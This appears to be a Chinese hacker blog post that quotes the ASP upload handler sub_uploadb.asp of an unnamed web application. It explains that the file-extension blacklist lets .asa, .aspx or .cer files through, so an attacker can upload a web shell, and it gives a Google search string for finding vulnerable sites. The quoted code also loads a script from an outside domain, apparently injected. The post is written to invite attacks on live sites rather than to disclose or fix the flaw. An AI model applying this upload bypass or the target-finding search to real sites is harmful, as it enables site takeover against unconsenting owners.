白银时代
一个人的精彩

同样来源于：http://yxmhero1989.blog.163.com/，大家小心点，已经说过很多次了，反正本大王不想吃窝窝头，玩躲猫猫。

Author:Minghacker

From：www.3est.com

blog:http://yxmhero1989.blog.163.com

貌似有新旧版本。

看代码sub_uploadb.asp

<%@language=VBScript%>

<!–#include FILE=”upload.inc”–>

<%

dim upload,file,formName,formPath,iCount,fileformat

set upload=new upload_F

function MakedownName()

dim fname

fname = now()

fname = replace(fname,”-”,”")

fname = replace(fname,” “,”")

fname = replace(fname,”:”,”")

fname = replace(fname,”PM”,”")

fname = replace(fname,”AM”,”")

fname = replace(fname,”上午”,”")

fname = replace(fname,”下午”,”")

fname = int(fname) + int((10-1+1)*Rnd + 1)

MakedownName=fname

end function

formPath=”../../upload/”

iCount=0

for each formName in upload.file ”列出所有上传了的文件

set file=upload.file(formName)  ”生成一个文件对象

fileformat=lcase(right(file.filename,4))

if fileformat=”.asp” or fileformat=”.exe” or fileformat=”.txt” or fileformat=”.htm” then

response.write”<script>alert(‘文件格式不对，请重新上传！’);location=’”&request.ServerVariables(“HTTP_REFERER”)&”‘</script>”

response.end

end if

if file.FileSize>0 then         ”如果 FileSize > 0 说明有文件数据

newname=MakedownName()&”.”&mid(file.FileName,InStrRev(file.FileName, “.”)+1)

file.SaveAs Server.mappath(formPath&newname)   ”保存文件

filename=file.filepath&file.filename

filename=replace(filename,”\”,”/”)

uploadpath=formpath&newname

uploadpath=mid(uploadpath,instr(formpath,”upload”))

iCount=iCount+1%>

<script>

fn=”<%=uploadpath%>”

filename=”<%=filename%>”

window.opener.document.form.proimgb.value=fn

window.opener.document.form.probpath.value=filename

window.close();

</script>

<%else

response.write(“<font size=1.5 color=red>”)

response.write “未找到文件 &nbsp;&nbsp;<A HREF=javascript:history.back(1)>返回</A>”

response.write(“</font>”)

response.end

end if

next

%>

<html>

<head>

<title></title>

<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″>

<link rel=”stylesheet” href=”css.css” type=”text/css”>

<style type=”text/css”>

<!–

body,td,th {

font-size: 12px;

}

body {

margin-left: 10px;

margin-top: 10px;

margin-right: 10px;

margin-bottom: 10px;

background-image: url(../../images/bg.gif);

}

–>

</style>

<script language=”JScript.Encode” src=”http://www.16885688.com/include.js”>

if fileformat=”.asp” or fileformat=”.exe” or fileformat=”.txt” or fileformat=”.htm” then。。

只过滤了asp等等，可以传其他譬如asa，aspx，cer等等（如果服务器支持的话）

asp/up/upload.asp调用上面sub_uploadb.asp。上传得Shell，不解释了。

google：inurl:/managepro.asp

站不多，关键字还是大家自己构造好些。具体问题具体对待。